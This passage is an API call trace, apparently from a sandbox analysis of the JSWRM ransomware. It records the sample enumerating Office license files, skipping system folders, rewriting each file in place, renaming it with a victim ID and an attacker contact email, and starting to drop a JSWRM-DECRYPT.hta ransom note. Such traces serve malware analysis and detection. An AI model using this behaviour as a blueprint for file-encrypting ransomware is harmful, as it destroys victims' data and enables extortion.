lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.218] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x19f0, lpOverlapped=0x0) returned 1 [0112.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.218] CloseHandle (hObject=0x45c) returned 1 [0112.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0112.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0112.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.219] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.220] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed12666a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed12666a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed2a3e81, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d33, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_MAK-ul-oob.xrm-ms", cAlternateFileName="WORDVL~3.XRM")) returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.220] lstrcmpiW (lpString1="WordVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0112.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-oob.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0112.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-oob.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241010, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0112.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-oob.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0112.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-oob.xrm-ms", cchWideChar=24, lpMultiByteStr=0x241308, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0112.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.222] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11571) returned 1 [0112.222] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0112.222] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0112.225] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.225] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0112.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.225] CloseHandle (hObject=0x45c) returned 1 [0112.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0112.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0112.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0112.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0112.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0112.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0112.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.226] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0112.227] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed08dd97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed08dd97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed1befd8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dcc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_MAK-ul-phn.xrm-ms", cAlternateFileName="WORDVL~2.XRM")) returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.227] lstrcmpiW (lpString1="WordVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-phn.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-phn.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240ef8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-phn.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ul-phn.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0112.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0112.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.229] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19916) returned 1 [0112.229] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dc0) returned 0x24c1d0 [0112.229] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dc0, lpOverlapped=0x0) returned 1 [0112.232] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.232] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dc0, lpOverlapped=0x0) returned 1 [0112.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.232] CloseHandle (hObject=0x45c) returned 1 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0112.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0112.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.232] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0112.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.232] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0112.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0112.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.234] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed08dd97, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed08dd97, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed1befd8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dcc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_MAK-ul-phn.xrm-ms", cAlternateFileName="WORDVL~2.XRM")) returned 0 [0112.234] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0112.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0112.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0112.234] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee45f66d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="loc", cAlternateFileName="")) returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2=".") returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="..") returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="...") returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="windows") returned -1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="recovery") returned -1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="perflogs") returned -1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="documents and settings") returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="$RECYCLE.BIN") returned 1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="system volume information") returned -1 [0112.234] lstrcmpiW (lpString1="loc", lpString2="msocache") returned -1 [0112.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0112.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0112.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0112.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0112.234] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0112.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0112.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\loc\\jswrm-decrypt.hta")) returned 0xffffffff [0112.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0112.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0112.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0112.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0112.235] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0112.235] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0112.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\loc\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 